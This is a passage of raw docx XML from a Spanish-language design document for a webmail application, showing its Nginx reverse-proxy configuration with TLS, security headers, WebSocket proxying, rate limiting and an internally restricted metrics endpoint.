      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"2045:2045"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"4025:4025"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"1143:1143"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3002:3002"</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webmail6_net</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">profiles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">e2e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="224"/>
    <w:bookmarkEnd w:id="225"/>
    <w:bookmarkStart w:id="229" w:name="nginx-configuration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.3 Nginx Configuration</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="226" w:name="X99e3828eac8ea00317704e6329b01818a6b497c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.3.1 Reverse Proxy: /api → Fastify, /ws → Socket.IO, SPA Fallback</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nginx actúa como reverse proxy, terminador SSL y punto único de entrada. Su arquitectura event-driven soporta 10,000+ conexiones simultáneas con ~2.5MB de memoria por 10k conexiones inactivas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[149]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># nginx/conf.d/webmail.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">upstream api_backend {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    server api:3000;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    keepalive 32;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">upstream ws_backend {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    server api:3001;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    keepalive 32;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Rate limiting zones</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit_req_zone $binary_remote_addr zone=login:10m rate=1r/s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit_req_zone $binary_remote_addr zone=api:10m rate=30r/s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit_req_zone $binary_remote_addr zone=general:10m rate=10r/s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">limit_conn_zone $binary_remote_addr zone=addr:10m;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Map para WebSocket upgrade</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">map $http_upgrade $connection_upgrade {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    default upgrade;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ''      close;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    listen 80;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    server_name _;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Redirect HTTP to HTTPS in production</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location / {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 301 https://$host$request_uri;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">server {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    listen 443 ssl http2;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    server_name webmail6.local;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SSL certificates (Let's Encrypt or self-signed)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ssl_certificate /etc/letsencrypt/live/webmail6.local/fullchain.pem;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ssl_certificate_key /etc/letsencrypt/live/webmail6.local/privkey.pem;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ssl_protocols TLSv1.2 TLSv1.3;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ssl_prefer_server_ciphers off;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Security headers</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_header X-Frame-Options "SAMEORIGIN" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_header X-Content-Type-Options "nosniff" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_header X-XSS-Protection "1; mode=block" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_header Referrer-Policy "strict-origin-when-cross-origin" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob: https:; connect-src 'self' wss: https:; font-src 'self';" always;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Rate limiting general</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit_req zone=general burst=20 nodelay;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit_conn addr 20;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # API proxy (Fastify)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location /api/ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        limit_req zone=api burst=50 delay=30;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        limit_req_status 429;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_pass http://api_backend/;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_http_version 1.1;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proxy_connect_timeout 30s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_send_timeout 30s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_read_timeout 30s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Login endpoint (rate limit estricto)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location /api/v1/auth/login {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        limit_req zone=login burst=3 nodelay;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        limit_req_status 429;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_pass http://api_backend/api/v1/auth/login;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_http_version 1.1;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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # WebSocket proxy (Socket.IO)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location /ws/ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_pass http://ws_backend/;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_http_version 1.1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_set_header Upgrade $http_upgrade;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_set_header Connection $connection_upgrade;</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proxy_read_timeout 86400s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_send_timeout 86400s;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Métricas Prometheus (protegidas, solo red interna)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location /metrics {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        allow 10.0.0.0/8;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        allow 172.16.0.0/12;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        allow 127.0.0.1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        deny all;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_pass http://api_backend/metrics;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        proxy_http_version 1.1;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Static files (SPA)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location / {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        root /usr/share/nginx/html;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        try_files $uri $uri/ /index.html;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Cache static assets</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        location ~* \.(js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot)$ {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            expires 1y;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">            add_header Cache-Control "public, immutable";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Error pages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    error_page 429 @rate_limit;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    location @rate_limit {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        return 429 '{"error":"Rate limit exceeded","retryAfter":"60"}';</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        add_header Content-Type application/json;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="226"/>
    <w:bookmarkStart w:id="227" w:name="rate-limiting-configuración"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.3.2 Rate Limiting Configuración</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="1386"/>
        <w:gridCol w:w="2178"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Burst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Propósito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/v1/auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 r/s</w:t>
